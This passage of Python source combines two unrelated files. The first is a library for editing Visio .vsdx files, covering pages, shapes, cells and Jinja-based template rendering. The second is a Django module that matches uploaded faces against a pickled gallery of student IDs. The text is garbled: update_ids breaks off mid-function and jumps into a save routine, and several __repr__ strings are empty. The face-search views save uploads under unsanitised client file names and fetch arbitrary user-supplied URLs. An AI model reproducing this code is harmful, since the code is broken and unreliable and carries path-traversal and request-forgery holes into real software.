zero-based index where the new page will be placed :type index: int :param name: The name of the new page :type name: str, optional :return: :class:`Page` object representing the new page """ # Determine the new page's name new_page_name = self._get_new_page_name(name or f'Page-{len(self.pages) + 1}') # Determine the new page's filename new_page_filename = f'page{len(self.pages) + 1}.xml' # Add reference to the new page in pages.xml.rels and get new relid new_page_relid = self._update_pages_xml_rels(new_page_filename) # Create default empty page xml # TODO: figure out the best way to define this default pagesheet XML # For example, python-docx has a 'template.docx' file which is copied. new_pagesheet_attribs = { 'FillStyle': '0', 'LineStyle': '0', 'TextStyle': '0' } new_pagesheet_element = Element(f'{namespace}PageSheet', new_pagesheet_attribs) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageWidth', 'V':'8.26771653543307'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageHeight', 'V':'11.69291338582677'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwOffsetX', 'V':'0.1181102362204724'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwOffsetY', 'V':'-0.1181102362204724'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageScale', 'U':'MM', 'V':'0.03937007874015748'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'DrawingScale', 'U':'MM', 'V':'0.03937007874015748'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'DrawingSizeType', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'DrawingScaleType', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'InhibitSnap', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageLockReplace', 'U':'BOOL', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageLockDuplicate', 'U':'BOOL', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'UIVisibility', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwType', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwObliqueAngle', 'V':'0'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'ShdwScaleFactor', 'V':'1'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'DrawingResizeType', 'V':'1'})) new_pagesheet_element.append(Element(f'{namespace}Cell', {'N':'PageShapeSplit', 'V':'1'})) new_page_attribs = { 'ID' : str(self._get_max_page_id() + 1), 'NameU': new_page_name, 'Name' : new_page_name, } new_page_element = Element(f'{namespace}Page', new_page_attribs) new_page_element.append(new_pagesheet_element) new_page_rel = { '{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id' : new_page_relid } new_page_element.append(Element(f'{namespace}Rel', new_page_rel)) # create the new page new_page = self._create_page( new_page_xml_str = f"", page_name = new_page_name, new_page_element = new_page_element, index = index ) return new_page def add_page(self, name: Optional[str] = None) -> VisioFile.Page: """Add a new page at the end of the VisioFile :param name: The name of the new page :type name: str, optional :return: Page object representing the new page """ return self.add_page_at(PagePosition.LAST, name) def copy_page(self, page: VisioFile.Page, *, index: Optional[int] = PagePosition.AFTER, name: Optional[str] = None) -> VisioFile.Page: """Copy an existing page and insert in 
VisioFile :param page: the :class Page: to copy :type page: VisioFile.Page :param index: the specific int or relation PagePosition location for new page :type index: int or PagePosition :param name: name of new page (note this may be altered if name already exists) :type name: str :return: the newly created page """ # Determine the new page's name new_page_name = self._get_new_page_name(name or page.name) # Determine the new page's filename new_page_filename = f'page{len(self.pages) + 1}.xml' # Add reference to the new page in pages.xml.rels and get new relid new_page_relid = self._update_pages_xml_rels(new_page_filename) # Copy the source page and update relevant attributes page_element = self.pages_xml.find(f"{namespace}Page[@Name='{page.name}']") new_page_element = ET.fromstring(ET.tostring(page_element)) new_page_element.attrib['ID'] = str(self._get_max_page_id() + 1) new_page_element.attrib['NameU'] = new_page_name new_page_element.attrib['Name'] = new_page_name new_page_element.find(f'{namespace}Rel').attrib['{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id'] = new_page_relid # create the new page new_page = self._create_page( new_page_xml_str = ET.tostring(page.xml.getroot()), page_name = new_page_name, new_page_element = new_page_element, index = index, source_page = page, ) # copy pageX.xml.rels if it exists # from testing, this does not actually seem to make a difference _, original_filename = os.path.split(page.filename) page_xml_rels_file = f'{self.directory}/visio/pages/_rels/{original_filename}.rels' # TODO: better concatenation new_page_xml_rels_file = f'{self.directory}/visio/pages/_rels/{new_page_filename}.rels' # TODO: better concatenation try: shutil.copy(page_xml_rels_file, new_page_xml_rels_file) except FileNotFoundError: pass return new_page # TODO: dead code - never used def get_sub_shapes(self, shape: Element, nth=1): for e in shape: if 'Shapes' in e.tag: nth -= 1 if not nth: return e @staticmethod def get_shape_location(shape: Element) -> (float, float): x, y = 0.0, 0.0 cell_PinX = shape.find(f'{namespace}Cell[@N="PinX"]') # type: Element cell_PinY = shape.find(f'{namespace}Cell[@N="PinY"]') x = float(cell_PinX.attrib['V']) y = float(cell_PinY.attrib['V']) return x, y @staticmethod def set_shape_location(shape: Element, x: float, y: float): cell_PinX = shape.find(f'{namespace}Cell[@N="PinX"]') # type: Element cell_PinY = shape.find(f'{namespace}Cell[@N="PinY"]') cell_PinX.attrib['V'] = str(x) cell_PinY.attrib['V'] = str(y) @staticmethod # TODO: is this never used? def get_shape_text(shape: ET) -> str: # technically the below is not an exact replacement of the above... text = "" text_elem = shape.find(f"{namespace}Text") if text_elem is not None: text = "".join(text_elem.itertext()) return text @staticmethod # TODO: is this never used? 
def set_shape_text(shape: ET, text: str): t = shape.find(f"{namespace}Text") # type: Element if t is not None: if t.text: t.text = text else: t[0].tail = text # context = {'customer_name':'co.', 'year':2020 } # example shape text "For {{customer_name}} (c){{year}}" -> "For codypy.com (c)2020" @staticmethod def apply_text_context(shapes: Element, context: dict): def _replace_shape_text(shape: Element, context: dict): text = VisioFile.get_shape_text(shape) for key in context.keys(): r_key = "{{" + key + "}}" text = text.replace(r_key, str(context[key])) VisioFile.set_shape_text(shape, text) for shape in shapes.findall(f"{namespace}Shapes"): VisioFile.apply_text_context(shape, context) # recursive call _replace_shape_text(shape, context) for shape in shapes.findall(f"{namespace}Shape"): _replace_shape_text(shape, context) def jinja_render_vsdx(self, context: dict): """Transform a template VisioFile object using the Jinja language The method updates the VisioFile object loaded from the template file, so does not return any value Note: vsdx specific extensions are available such as `{% for item in list %}` statements with no `{% endfor %}` :param context: A dictionary containing values that can be accessed by the Jinja processor :type context: dict :return: None """ # parse each shape in each page as Jinja2 template with context pages_to_remove = [] # list of pages to be removed after loop for page in self.pages: # type: VisioFile.Page # check if page should be removed if VisioFile.jinja_page_showif(page, context): loop_shape_ids = list() for shapes_by_id in page.shapes: # type: VisioFile.Shape VisioFile.jinja_render_shape(shape=shapes_by_id, context=context, loop_shape_ids=loop_shape_ids) source = ET.tostring(page.xml.getroot(), encoding='unicode') source = VisioFile.unescape_jinja_statements(source) # unescape chars like < and > inside {%...%} template = Template(source) output = template.render(context) page.xml = ET.ElementTree(ET.fromstring(output)) # create ElementTree from Element created from output # update loop shape IDs page.set_max_ids() for shape_id in loop_shape_ids: shapes_by_id = page.find_shapes_by_id(shape_id) # type: List[VisioFile.Shape] if shapes_by_id and len(shapes_by_id) > 1: delta = 0 for shape in shapes_by_id[1:]: # from the 2nd onwards - leaving original unchanged # increment each new shape duplicated by the jinja loop self.increment_sub_shape_ids(shape, page) delta += shape.height # automatically move each duplicate down shape.move(0, -delta) # move duplicated shapes so they are visible else: # note page to remove after this loop has completed pages_to_remove.append(page) # remove pages after processing for p in pages_to_remove: self.remove_page_by_index(p.index_num) @staticmethod def jinja_render_shape(shape: VisioFile.Shape, context: dict, loop_shape_ids: list): prev_shape = None for s in shape.sub_shapes(): # type: VisioFile.Shape # manage for loops in template loop_shape_id = VisioFile.jinja_create_for_loop_if(s, prev_shape) if loop_shape_id: loop_shape_ids.append(loop_shape_id) prev_shape = s # manage 'set self' statements VisioFile.jinja_set_selfs(s, context) VisioFile.jinja_render_shape(shape=s, context=context, loop_shape_ids=loop_shape_ids) @staticmethod def jinja_set_selfs(shape: VisioFile.Shape, context: dict): # apply any {% self self.xxx = yyy %} statements in shape properties jinja_source = shape.text matches = re.findall('{% set self.(.*?)\s?=\s?(.*?) 
%}', jinja_source) # non-greedy search for all {%...%} strings for m in matches: # type: tuple # expect ('property', 'value') such as ('x', '10') or ('y', 'n*2') property_name = m[0] value = "{{ "+m[1]+" }}" # Jinja to be processed # todo: replace any self references in value with actual value - i.e. {% set self.x = self.x+1 %} self_refs = re.findall('self.(.*)[\s+-/*//]?', m[1]) # greedy search for all self.? between +, -, *, or / for self_ref in self_refs: # type: tuple # expect ('property', 'value') such as ('x', '10') or ('y', 'n*2') ref_val = str(shape.__getattribute__(self_ref[0])) value = value.replace('self.'+self_ref[0], ref_val) # use Jinja template to calculate any self refs found template = Template(value) # value might be '{{ 1.0+2.4*3 }}' value = template.render(context) if property_name in ['x', 'y']: shape.__setattr__(property_name, value) # remove any {% set self %} statements, leaving any remaining text matches = re.findall('{% set self.*?%}', jinja_source) for m in matches: jinja_source = jinja_source.replace(m, '') # remove Jinja 'set self' statement shape.text = jinja_source @staticmethod def unescape_jinja_statements(jinja_source): # unescape any text between {% ... %} jinja_source_out = jinja_source matches = re.findall('{%(.*?)%}', jinja_source) # non-greedy search for all {%...%} strings for m in matches: unescaped = m.replace('>', '>').replace('<', '<') jinja_source_out = jinja_source_out.replace(m, unescaped) return jinja_source_out @staticmethod def jinja_create_for_loop_if(shape: VisioFile.Shape, previous_shape:VisioFile.Shape or None): # update a Shapes tag where text looks like a jinja {% for xxxx %} loop # move text to start of Shapes tag and add {% endfor %} at end of tag text = shape.text # use regex to find all loops jinja_loops = re.findall("{% for\s(.*?)\s%}", text) for loop in jinja_loops: jinja_loop_text = f"{{% for {loop} %}}" # move the for loop to start of shapes element (just before first Shape element) if previous_shape: if previous_shape.xml.tail: previous_shape.xml.tail += jinja_loop_text else: previous_shape.xml.tail = jinja_loop_text # add jinja loop text after previous shape, before this element else: if shape.parent.xml.text: shape.parent.xml.text += jinja_loop_text else: shape.parent.xml.text = jinja_loop_text # add jinja loop at start of parent, just before this element shape.text = shape.text.replace(jinja_loop_text, '') # remove jinja loop from tag in element # add closing 'endfor' to just inside the shapes element, after last shape if shape.xml.tail: # extend or set text at end of Shape element shape.xml.tail += "{% endfor %}" else: shape.xml.tail = '{% endfor %}' jinja_show_ifs = re.findall("{% showif\s(.*?)\s%}", text) # find all showif statements # jinja_show_if - translate non-standard {% showif statement %} to valid jinja if statement for show_if in jinja_show_ifs: jinja_show_if = f"{{% if {show_if} %}}" # translate to actual jinja if statement # move the for loop to start of shapes element (just before first Shape element) if previous_shape: previous_shape.xml.tail = str(previous_shape.xml.tail or '')+jinja_show_if # add jinja loop text after previous shape, before this element else: shape.parent.xml.text = str(shape.parent.xml.text or '')+jinja_show_if # add jinja loop at start of parent, just before this element # remove original jinja showif from tag in element shape.text = shape.text.replace(f"{{% showif {show_if} %}}", '') # add closing 'endfor' to just inside the shapes element, after last shape if shape.xml.tail: # extend 
or set text at end of Shape element shape.xml.tail += "{% endif %}" else: shape.xml.tail = '{% endif %}' if jinja_loops: return shape.ID # return shape ID if it is a loop, so that duplicate shape IDs can be updated @staticmethod def jinja_page_showif(page: VisioFile.Page, context: dict): text = page.name jinja_source = re.findall("{% showif\s(.*?)\s%}", text) if len(jinja_source): # process last matching value template_source = "{{ "+jinja_source[-1]+" }}" template = Template(template_source) # value might be '{{ 1.0+2.4*3 }}' value = template.render(context) # is the value truthy - i.e. not 0, False, or empty string, tuple, list or dict print(f"jinja_page_showif(context={context}) statement: {template_source} returns: {type(value)} {value}") if value in ['False', '0', '', '()', '[]', '{}']: print("value in ['False', '0', '', '()', '[]', '{}']") return False # page should be hidden # remove jinja statement from page name jinja_statement = re.match("{%.*?%}", page.name)[0] page.set_name(page.name.replace(jinja_statement, '')) print(f"jinja_statement={jinja_statement} page.name={page.name}") return True # page should be left in @staticmethod def get_shape_id(shape: ET) -> str: return shape.attrib['ID'] def increment_sub_shape_ids(self, shape: VisioFile.Shape, page, id_map: dict = None): id_map = self.increment_shape_ids(shape.xml, page, id_map) self.update_ids(shape.xml, id_map) for s in shape.sub_shapes(): id_map = self.increment_shape_ids(s.xml, page, id_map) self.update_ids(s.xml, id_map) if s.sub_shapes(): id_map = self.increment_sub_shape_ids(s, page, id_map) return id_map def copy_shape(self, shape: Element, page: ET, page_path: str) -> ET: """Insert shape into first Shapes tag in destination page, and return the copy. If destination page does not have a Shapes tag yet, create it. Parameters: shape (Element): The source shape to be copied. Use Shape.xml page (ElementTree): The page where the new Shape will be placed. Use Page.xml page_path (str): The filename of the page where the new Shape will be placed. 
Use Page.filename Returns: ElementTree: The new shape ElementTree """ new_shape = ET.fromstring(ET.tostring(shape)) for page_obj in self.pages: if page_obj.filename == page_path: break page_obj.set_max_ids() # find or create Shapes tag shapes_tag = page.find(f"{namespace}Shapes") if shapes_tag is None: shapes_tag = Element(f"{namespace}Shapes") page.getroot().append(shapes_tag) id_map = self.increment_shape_ids(new_shape, page_obj) self.update_ids(new_shape, id_map) shapes_tag.append(new_shape) return new_shape def insert_shape(self, shape: Element, shapes: Element, page: ET, page_path: str) -> ET: # insert shape into shapes tag, and return updated shapes tag for page_obj in self.pages: if page_obj.filename == page_path: break id_map = self.increment_shape_ids(shape, page_obj) self.update_ids(shape, id_map) shapes.append(shape) return shapes def increment_shape_ids(self, shape: Element, page: VisioFile.Page, id_map: dict=None): if id_map is None: id_map = dict() self.set_new_id(shape, page, id_map) for e in shape.findall(f"{namespace}Shapes"): self.increment_shape_ids(e, page, id_map) for e in shape.findall(f"{namespace}Shape"): self.set_new_id(e, page, id_map) return id_map def set_new_id(self, element: Element, page: VisioFile.Page, id_map: dict): page.max_id += 1 max_id = page.max_id if element.attrib.get('ID'): current_id = element.attrib['ID'] id_map[current_id] = max_id # record mappings element.attrib['ID'] = str(max_id) return max_id # return new id for info def update_ids(self, shape: Element, id_map: dict): # update: 0: directory = new_filename[0:new_filename.rfind(os.sep)] if directory: if not os.path.exists(directory): os.mkdir(directory) shutil.make_archive(base_filename, 'zip', self.directory) if not new_filename: shutil.move(base_filename + '.zip', base_filename + '_new.vsdx') else: if new_filename[-5:] != '.vsdx': new_filename += '.vsdx' shutil.move(base_filename + '.zip', new_filename) self.close_vsdx() class Cell: def __init__(self, xml: Element, shape: VisioFile.Shape): self.xml = xml self.shape = shape @property def value(self): return self.xml.attrib.get('V') @value.setter def value(self, value: str): self.xml.attrib['V'] = str(value) @property def name(self): return self.xml.attrib.get('N') @property def func(self): # assume F stands for function, i.e. F="Width*0.5" return self.xml.attrib.get('F') def __repr__(self): return f"Cell: name={self.name} val={self.value} func={self.func}" class ShapeProperty: def __init__(self, name: str, value, shape: VisioFile.Shape): self.name = name self.value = value self.shape = shape class Shape: """Represents a single shape, or a group shape containing other shapes """ def __init__(self, xml: Element, parent: VisioFile.Page or VisioFile.Shape, page: VisioFile.Page): self.xml = xml self.parent = parent self.tag = xml.tag self.ID = xml.attrib.get('ID', None) self.master_shape_ID = xml.attrib.get('MasterShape', None) self.master_page_ID = xml.attrib.get('Master', None) if self.master_page_ID is None and isinstance(parent, VisioFile.Shape): # in case of a sub_shape self.master_page_ID = parent.master_page_ID self.shape_type = xml.attrib.get('Type', None) self.page = page # get Cells in Shape self.cells = dict() for e in self.xml.findall(f"{namespace}Cell"): cell = VisioFile.Cell(xml=e, shape=self) self.cells[cell.name] = cell def __repr__(self): return f"" def copy(self, page: Optional[VisioFile.Page] = None) -> VisioFile.Shape: """Copy this Shape to the specified destination Page, and return the copy. 
If the destination page is not specified, the Shape is copied to its containing Page. :param page: The page where the new Shape will be placed. If not specified, the copy will be placed in the original shape's page. :type page: :class:`Page` (Optional) :return: :class:`Shape` the new copy of shape """ dst_page = page or self.page new_shape_xml = self.page.vis.copy_shape(self.xml, dst_page.xml, dst_page.filename) # set parent: location for new shape tag to be added if page: # set parent to first page Shapes tag if destination page passed parent = page.shapes else: # or set parent to source shapes own parent parent = self.parent return VisioFile.Shape(xml=new_shape_xml, parent=parent, page=dst_page) @property def master_shape(self) -> VisioFile.Shape: """Get this shapes master Returns this Shape's master as a Shape object (or None) """ master_page = self.page.vis.get_master_page_by_id(self.master_page_ID) if not master_page: return # None if no master page set for this Shape master_shape = master_page.shapes[0].sub_shapes()[0] # there's always a single master shape in a master page if self.master_shape_ID is not None: master_sub_shape = master_shape.find_shape_by_id(self.master_shape_ID) return master_sub_shape return master_shape @property def data_properties(self) -> List[VisioFile.ShapeProperty]: properties = list() properties_xml = self.xml.find(f'{namespace}Section[@N="Property"]') property_rows = properties_xml.findall(f'{namespace}Row') for prop in property_rows: name = prop.attrib.get('N') value_cell = prop.find(f'{namespace}Cell[@N="Value"]') value = value_cell.attrib.get('V') if value_cell else None properties.append(VisioFile.ShapeProperty(name=name, value=value, shape=self)) return properties def cell_value(self, name: str): cell = self.cells.get(name) if cell: return cell.value if self.master_page_ID is not None: return self.master_shape.cell_value(name) def set_cell_value(self, name: str, value: str): cell = self.cells.get(name) if cell: # only set value of existing item cell.value = value elif self.master_page_ID is not None: master_cell_xml = self.master_shape.xml.find(f'{namespace}Cell[@N="{name}"]') new_cell = ET.fromstring(ET.tostring(master_cell_xml)) self.cells[name] = VisioFile.Cell(xml=new_cell, shape=self) self.cells[name].value = value self.xml.append(self.cells[name].xml) @property def line_weight(self) -> float: val = self.cell_value('LineWeight') return to_float(val) @line_weight.setter def line_weight(self, value: float or str): self.set_cell_value('LineWeight', str(value)) @property def line_color(self) -> str: return self.cell_value('LineColor') @line_color.setter def line_color(self, value: str): self.set_cell_value('LineColor', str(value)) @property def x(self): return to_float(self.cell_value('PinX')) @x.setter def x(self, value: float or str): self.set_cell_value('PinX', str(value)) @property def y(self): return to_float(self.cell_value('PinY')) @y.setter def y(self, value: float or str): self.set_cell_value('PinY', str(value)) @property def begin_x(self): return to_float(self.cell_value('BeginX')) @begin_x.setter def begin_x(self, value: float or str): self.set_cell_value('BeginX', str(value)) @property def begin_y(self): return to_float(self.cell_value('BeginY')) @begin_y.setter def begin_y(self, value: float or str): self.set_cell_value('BeginY', str(value)) @property def end_x(self): return to_float(self.cell_value('EndX')) @end_x.setter def end_x(self, value: float or str): self.set_cell_value('EndX', str(value)) @property def end_y(self): return 
to_float(self.cell_value('EndY')) @end_y.setter def end_y(self, value: float or str): self.set_cell_value('EndY', str(value)) def move(self, x_delta: float, y_delta: float): self.x = self.x + x_delta self.y = self.y + y_delta @property def height(self): return to_float(self.cell_value('Height')) @height.setter def height(self, value: float or str): self.set_cell_value('Height', str(value)) @property def width(self): return to_float(self.cell_value('Width')) @width.setter def width(self, value: float or str): self.set_cell_value('Width', str(value)) @staticmethod def clear_all_text_from_xml(x: Element): x.text = '' x.tail = '' for i in x: VisioFile.Shape.clear_all_text_from_xml(i) @property def text(self): # return contents of Text element, or Master shape (if referenced), or empty string text_element = self.xml.find(f"{namespace}Text") if isinstance(text_element, Element): return "".join(text_element.itertext()) # get all text from sub elements elif self.master_page_ID: return self.master_shape.text # get text from master shape return "" @text.setter def text(self, value): text_element = self.xml.find(f"{namespace}Text") if isinstance(text_element, Element): # if there is a Text element then clear out and set contents VisioFile.Shape.clear_all_text_from_xml(text_element) text_element.text = value # todo: create new Text element if not found def sub_shapes(self): shapes = list() # for each shapes tag, look for Shape objects # self can be either a Shapes or a Shape # a Shapes has a list of Shape # a Shape can have 0 or 1 Shapes (1 if type is Group) if self.shape_type == 'Group': parent_element = self.xml.find(f"{namespace}Shapes") else: # a Shapes parent_element = self.xml if parent_element: shapes = [VisioFile.Shape(xml=shape, parent=self, page=self.page) for shape in parent_element] else: shapes = [] return shapes def get_max_id(self): max_id = int(self.ID) if self.shape_type == 'Group': for shape in self.sub_shapes(): new_max = shape.get_max_id() if new_max > max_id: max_id = new_max return max_id def find_shape_by_id(self, shape_id: str) -> VisioFile.Shape: # returns Shape # recursively search for shapes by text and return first match for shape in self.sub_shapes(): # type: VisioFile.Shape if shape.ID == shape_id: return shape if shape.shape_type == 'Group': found = shape.find_shape_by_id(shape_id) if found: return found def find_shapes_by_id(self, shape_id: str) -> List[VisioFile.Shape]: # recursively search for shapes by ID and return all matches found = list() for shape in self.sub_shapes(): # type: VisioFile.Shape if shape.ID == shape_id: found.append(shape) if shape.shape_type == 'Group': sub_found = shape.find_shapes_by_id(shape_id) if sub_found: found.extend(sub_found) return found # return list of matching shapes def find_shapes_by_master(self, master_page_ID: str, master_shape_ID: str) -> List[VisioFile.Shape]: # recursively search for shapes by master ID and return all matches found = list() for shape in self.sub_shapes(): # type: VisioFile.Shape if shape.master_shape_ID == master_shape_ID and shape.master_page_ID == master_page_ID: found.append(shape) if shape.shape_type == 'Group': sub_found = shape.find_shapes_by_master(master_shape_ID, master_shape_ID) if sub_found: found.extend(sub_found) return found # return list of matching shapes def find_shape_by_text(self, text: str) -> VisioFile.Shape: # returns Shape # recursively search for shapes by text and return first match for shape in self.sub_shapes(): # type: VisioFile.Shape if text in shape.text: return shape if 
shape.shape_type == 'Group': found = shape.find_shape_by_text(text) if found: return found def find_shapes_by_text(self, text: str, shapes: List[VisioFile.Shape] = None) -> List[VisioFile.Shape]: # recursively search for shapes by text and return all matches if not shapes: shapes = list() for shape in self.sub_shapes(): # type: VisioFile.Shape if text in shape.text: shapes.append(shape) if shape.shape_type == 'Group': found = shape.find_shapes_by_text(text) if found: shapes.extend(found) return shapes def apply_text_filter(self, context: dict): # check text against all context keys text = self.text for key in context.keys(): r_key = "{{" + key + "}}" text = text.replace(r_key, str(context[key])) self.text = text for s in self.sub_shapes(): s.apply_text_filter(context) def find_replace(self, old: str, new: str): # find and replace text in this shape and sub shapes text = self.text self.text = text.replace(old, new) for s in self.sub_shapes(): s.find_replace(old, new) def remove(self): self.parent.xml.remove(self.xml) def append_shape(self, append_shape: VisioFile.Shape): # insert shape into shapes tag, and return updated shapes tag id_map = self.page.vis.increment_shape_ids(append_shape.xml, self.page) self.page.vis.update_ids(append_shape.xml, id_map) self.xml.append(append_shape.xml) @property def connects(self): # get list of connect items linking shapes connects = list() for c in self.page.connects: if self.ID in [c.shape_id, c.connector_shape_id]: connects.append(c) return connects @property def connected_shapes(self): # return a list of connected shapes shapes = list() for c in self.connects: if c.connector_shape_id != self.ID: shapes.append(self.page.find_shape_by_id(c.connector_shape_id)) if c.shape_id != self.ID: shapes.append(self.page.find_shape_by_id(c.shape_id)) return shapes class Connect: def __init__(self, xml: Element): self.xml = xml self.from_id = xml.attrib.get('FromSheet') # ref to the connector shape self.connector_shape_id = self.from_id self.to_id = xml.attrib.get('ToSheet') # ref to the shape where the connector terminates self.shape_id = self.to_id self.from_rel = xml.attrib.get('FromCell') # i.e. EndX / BeginX self.to_rel = xml.attrib.get('ToCell') # i.e. 
PinX def __repr__(self): return f"Connect: from={self.from_id} to={self.to_id} connector_id={self.connector_shape_id} shape_id={self.shape_id}" class Page: """Represents a page in a vsdx file :param vis: the VisioFile object the page belongs to :type vis: :class:`VisioFile` :param name: the name of the page :type name: str :param connects: a list of Connect objects in the page :type connects: List of :class:`Connect` """ def __init__(self, xml: ET.ElementTree, filename: str, page_name: str, vis: VisioFile): self._xml = xml self.filename = filename self.name = page_name self.vis = vis self.connects = self.get_connects() self.max_id = 0 def __repr__(self): return f"" def set_name(self, value: str): # todo: change to name property pages_filename = self.vis._pages_filename() # pages contains Page name, width, height, mapped to Id pages = file_to_xml(pages_filename) # this contains a list of pages with rel_id and filename page = pages.getroot().find(f"{namespace}Page[{self.index_num + 1}]") #print(f"set_name() page={VisioFile.pretty_print_element(page)}") if page: page.attrib['Name'] = value self.name = value self.vis.pages_xml = pages @property def xml(self): return self._xml @xml.setter def xml(self, value): self._xml = value @property def shapes(self): """Return a list of :class:`Shape` objects Note: typically returns one :class:`Shape` object which itself contains :class:`Shape` objects """ return [VisioFile.Shape(xml=shapes, parent=self, page=self) for shapes in self.xml.findall(f"{namespace}Shapes")] def set_max_ids(self): # get maximum shape id from xml in page for shapes in self.shapes: for shape in shapes.sub_shapes(): id = shape.get_max_id() if id > self.max_id: self.max_id = id return self.max_id @property def index_num(self): # return zero-based index of this page in parent VisioFile.pages list return self.vis.pages.index(self) def get_connects(self): elements = self.xml.findall(f".//{namespace}Connect") # search recursively connects = [VisioFile.Connect(e) for e in elements] return connects def get_connectors_between(self, shape_a_id: str='', shape_a_text: str='', shape_b_id: str='', shape_b_text: str=''): shape_a = self.find_shape_by_id(shape_a_id) if shape_a_id else self.find_shape_by_text(shape_a_text) shape_b = self.find_shape_by_id(shape_b_id) if shape_b_id else self.find_shape_by_text(shape_b_text) connector_ids = set(a.ID for a in shape_a.connected_shapes).intersection( set(b.ID for b in shape_b.connected_shapes)) connectors = set() for id in connector_ids: connectors.add(self.find_shape_by_id(id)) return connectors def apply_text_context(self, context: dict): for s in self.shapes: s.apply_text_filter(context) def find_replace(self, old: str, new: str): for s in self.shapes: s.find_replace(old, new) def find_shape_by_id(self, shape_id) -> VisioFile.Shape: for s in self.shapes: found = s.find_shape_by_id(shape_id) if found: return found def find_shapes_by_id(self, shape_id) -> List[VisioFile.Shape]: # return all shapes by ID found = list() for s in self.shapes: found = s.find_shapes_by_id(shape_id) if found: return found return found def find_shapes_with_same_master(self, shape: VisioFile.Shape) -> List[VisioFile.Shape]: # return all shapes with master found = list() for s in self.shapes: found = s.find_shapes_by_master(master_page_ID=shape.master_page_ID, master_shape_ID=shape.master_shape_ID) if found: return found return found def find_shape_by_text(self, text: str) -> VisioFile.Shape: for s in self.shapes: found = s.find_shape_by_text(text) if found: return found def 
find_shapes_by_text(self, text: str) -> List[VisioFile.Shape]: shapes = list() for s in self.shapes: found = s.find_shapes_by_text(text) if found: shapes.extend(found) return shapes def file_to_xml(filename: str) -> ET.ElementTree: """Import a file as an ElementTree""" try: tree = ET.parse(filename) return tree except FileNotFoundError: pass # return None def xml_to_file(xml: ET.ElementTree, filename: str): """Save an ElementTree to a file""" xml.write(filename) import base64 import io import json import os import pickle import time import numpy as np import requests from django.core.files.uploadedfile import InMemoryUploadedFile from django.http import HttpResponse from numpy.linalg import norm from cv.cfg import cfg from cv.models.numpy_encoder import NumpyEncoder from utils.feat_extractor import ext_face_feats from cv.models.net_sphere import SphereFaceNet BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) URL_PORT = 'http://localhost:8001' class FaceSearcher: """ Face Search Class Wrapper """ def __init__(self, face_feats_path=os.path.join(cfg['model_zoo_base'], 'face_features_gallery.pkl')): assert os.path.exists(face_feats_path) with open(face_feats_path, mode='rb') as f: face_feats_list = pickle.load(f) self.topK = 10 self.face_feats_list = face_feats_list self.sphere_face = SphereFaceNet(feature=True) def search(self, img_file): face_feat = ext_face_feats(sphere_face=SphereFaceNet(feature=True), img_path=img_file) compare_result = {} for face_obj in self.face_feats_list: norm_face_feature = face_feat['feature'] / np.linalg.norm(face_feat['feature']) norm_face_obj_feature = face_obj['feature'] / np.linalg.norm(face_obj['feature']) cos_sim = np.dot(norm_face_feature, norm_face_obj_feature) / \ (norm(norm_face_feature) * norm(norm_face_obj_feature)) compare_result[face_obj['studentid']] = cos_sim sorted_compare_result = sorted(compare_result.items(), key=lambda kv: kv[1], reverse=True) return { 'status': 0, 'message': 'Success', 'results': sorted_compare_result[0: self.topK] } face_searcher = FaceSearcher() def upload_and_ext_face_feats(request): """ upload and extract face features :param request: :return: """ image_dir = 'cv/static/FaceUpload' if not os.path.exists(image_dir): os.makedirs(image_dir) result = {} if request.method == "POST": image = request.FILES.get("image", None) if not image: result['code'] = 1 result['msg'] = 'Invalid Image' result['results'] = None json_result = json.dumps(result, ensure_ascii=False) return HttpResponse(json_result) else: destination = open(os.path.join(image_dir, image.name), 'wb+') for chunk in image.chunks(): destination.write(chunk) destination.close() tik = time.time() imagepath = URL_PORT + '/static/FaceUpload/' + image.name face_feats_result = ext_face_feats(os.path.join(image_dir, image.name)) result['code'] = 0 result['msg'] = 'Success' result['imgpath'] = imagepath result['results'] = face_feats_result['feature'] result['elapse'] = round(time.time() - tik, 2) json_str = json.dumps(result, ensure_ascii=False) return HttpResponse(json_str) else: result['code'] = 2 result['msg'] = 'Invalid HTTP Method' result['data'] = None json_result = json.dumps(result, ensure_ascii=False) return HttpResponse(json_result) def upload_and_search_face(request): """ upload and search face :param request: :return: """ image_dir = 'cv/static/FaceUpload' if not os.path.exists(image_dir): os.makedirs(image_dir) tik = time.time() result = {} if request.method == "POST": image = request.FILES.get("image", None) if not image: result['code'] = 1 
result['msg'] = 'invalid image' result['results'] = None json_result = json.dumps(result, ensure_ascii=False) return HttpResponse(json_result) if not isinstance(image, InMemoryUploadedFile): imgstr = request.POST.get("image", None) if 'http' in imgstr: response = requests.get(imgstr) image = InMemoryUploadedFile(io.BytesIO(response.content), name="{}.jpg".format(str(time.time())), field_name="image", content_type="image/jpeg", size=1347415, charset=None) else: image = InMemoryUploadedFile(io.BytesIO(base64.b64decode(imgstr)), name="{}.jpg".format(str(time.time())), field_name="image", content_type="image/jpeg", size=1347415, charset=None) else: destination = open(os.path.join(image_dir, image.name), 'wb+') for chunk in image.chunks(): destination.write(chunk) destination.close() result['code'] = 0 result['msg'] = 'Success' result['results'] = face_searcher.search(os.path.join(image_dir, image.name))['results'] result['elapse'] = round(time.time() - tik, 2) json_str = json.dumps(result, ensure_ascii=False, cls=NumpyEncoder) return HttpResponse(json_str) else: result['code'] = 3 result['msg'] = 'Invalid HTTP Method' result['data'] = None json_result = json.dumps(result, ensure_ascii=False) return HttpResponse(json_result) 